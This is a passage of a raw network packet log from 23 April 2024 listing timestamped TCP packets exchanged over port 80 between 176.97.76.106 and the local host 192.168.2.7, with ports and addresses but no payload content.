Apr 23, 2024 09:43:14.813536882 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813548088 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813549995 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813560963 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813569069 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813574076 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813582897 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813595057 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813596964 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813606024 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813620090 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813631058 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813631058 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813642979 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813653946 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813658953 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813664913 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813676119 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813678980 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813688040 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813688993 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813699961 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813714027 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813716888 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813729048 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813740969 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813741922 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813756943 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813774109 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813787937 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813797951 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813805103 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813817978 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813829899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813844919 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813847065 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813859940 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813872099 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813874006 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813888073 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813900948 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813913107 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813919067 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813925028 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813935995 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813940048 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813950062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813961983 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813966036 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813972950 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813977957 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.813987017 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.813997984 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814004898 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814008951 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814023018 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814033031 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814039946 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814043999 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814054012 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814065933 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814078093 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814080000 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814089060 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814100027 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814102888 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814111948 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814125061 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814126015 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814140081 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814152956 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814153910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814166069 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814177990 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814178944 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814191103 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814202070 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814202070 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814213037 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814224005 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814224958 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814239979 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814251900 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814260960 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814264059 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814276934 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814281940 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814291000 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814301968 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814301968 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814312935 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814323902 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814336061 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814338923 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814347029 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814357996 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814364910 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814372063 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814378977 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814384937 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814397097 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814402103 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814414978 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814488888 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814502954 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814513922 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814526081 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814532995 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814538002 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814548969 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814559937 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814559937 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814570904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814572096 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814585924 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814596891 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814599991 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814620018 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814631939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814636946 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814644098 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814656019 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814661026 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814668894 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814681053 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814685106 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814692020 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814703941 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814711094 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814714909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814727068 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814733982 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814739943 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814750910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814754963 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814773083 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814775944 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814786911 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814798117 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814810991 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814817905 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814824104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814836025 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814841986 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814852953 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814863920 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814866066 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814876080 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814888954 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814896107 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814903021 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814913988 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814918995 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.814925909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814938068 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814949036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814960003 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814970970 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814982891 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.814994097 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815005064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815009117 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815016985 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815028906 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815040112 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815046072 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815059900 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815071106 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815072060 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815083027 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815084934 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815097094 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815109015 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815112114 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815123081 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815135002 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815139055 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815146923 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815157890 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815171003 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815176964 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815182924 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815195084 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815200090 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815206051 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815217972 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815222979 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815228939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815241098 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815241098 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815253019 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815258980 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815268040 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815279961 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815283060 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815291882 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815303087 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815306902 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815314054 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815325022 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815335989 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815347910 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815347910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815360069 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815366983 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815377951 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815404892 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815478086 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815490007 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815500975 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815512896 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815524101 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815526009 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815535069 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815546036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815557003 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815561056 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815571070 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815586090 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815598011 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815603971 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815615892 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815628052 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815634012 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815643072 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815654993 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815655947 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815665960 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815677881 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815682888 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815691948 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815706968 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815711021 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815721989 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815735102 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815741062 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815749884 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815767050 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815799952 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815812111 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815825939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815836906 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815838099 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815851927 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815855026 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815864086 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815880060 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815886974 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815892935 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815903902 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815908909 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815916061 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815926075 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815934896 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815937996 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815948963 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815959930 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815960884 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.815972090 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.815996885 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816052914 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816063881 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816075087 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816087008 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816097975 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816106081 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816116095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816128969 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816142082 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816143036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816154003 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816155910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816167116 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816179037 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816180944 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816190958 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816203117 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816214085 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816214085 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816226006 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816236973 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816239119 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816246986 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816252947 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816258907 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816271067 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816281080 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816287994 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816302061 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816304922 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816318035 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816329002 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816330910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816343069 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816353083 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816354990 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816368103 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816378117 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816390038 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816396952 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816401958 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816414118 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816416979 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816425085 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816437006 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816447020 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816450119 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816462994 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816464901 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816481113 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816484928 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816497087 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816503048 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816509008 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816520929 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816534042 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816534042 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816546917 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816550016 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816557884 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816570044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816581964 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816585064 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816598892 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816610098 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816612005 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816625118 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816641092 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816648006 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816653013 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816657066 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.816663980 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.816677094 CEST	80	49702	176.97.76.106	192.168.2.7
